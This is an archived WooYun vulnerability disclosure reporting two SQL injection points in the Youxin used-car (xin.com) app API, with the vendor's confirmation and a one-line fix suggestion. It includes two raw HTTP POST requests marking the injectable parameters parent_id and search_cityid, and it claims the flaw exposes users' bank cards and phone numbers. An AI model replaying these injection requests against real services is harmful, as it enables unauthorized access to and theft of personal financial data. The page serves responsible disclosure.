当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0199666

漏洞标题:优信二手车APPPOST注入2枚

相关厂商:xin.com

漏洞作者: 反日联盟

提交时间:2016-05-05 15:31

修复时间:2016-06-20 10:50

公开时间:2016-06-20 10:50

漏洞类型:sql注入

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

优信二手车APP注入,泄露用户交易银行卡,手机号等敏感信息。

详细说明:

POST /question/question_tab_list/ HTTP/1.1
Content-Length: 124
Content-Type: application/x-www-form-urlencoded
Host: api.xin.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; iToolsAVM Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip
_apikey=97b49a&appver=5.8&cityid=502&limit=10&nb=82c2966df8e2d881e43fb3a930bf76d1&offset=0&os=android&parent_id=1175819*


注入点:parent_id

POST /home/cartotal/ HTTP/1.1
Content-Length: 101
Content-Type: application/x-www-form-urlencoded
Host: api.xin.com
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; iToolsAVM Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Cookie: uid=rBAKHlca/UAC6oMMA8GyAg==; NSC_30.eqppmxfc.yjo.dpn=ffffffffaf18140f45525d5f4f58455e445a4a423660
Cookie2: $Version=1
Accept-Encoding: gzip
_apikey=41e9ec&appver=5.8&cityid=502&nb=82c2966df8e2d881e43fb3a930bf76d1&os=android&search_cityid=502'


注入点:search_cityid

漏洞证明:

test2.png


test4.png


test1.png


test3.png

修复方案:

严格过滤参数

版权声明:转载请注明来源 反日联盟@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-05-06 10:48

厂商回复:

已确认漏洞存在

最新状态:

暂无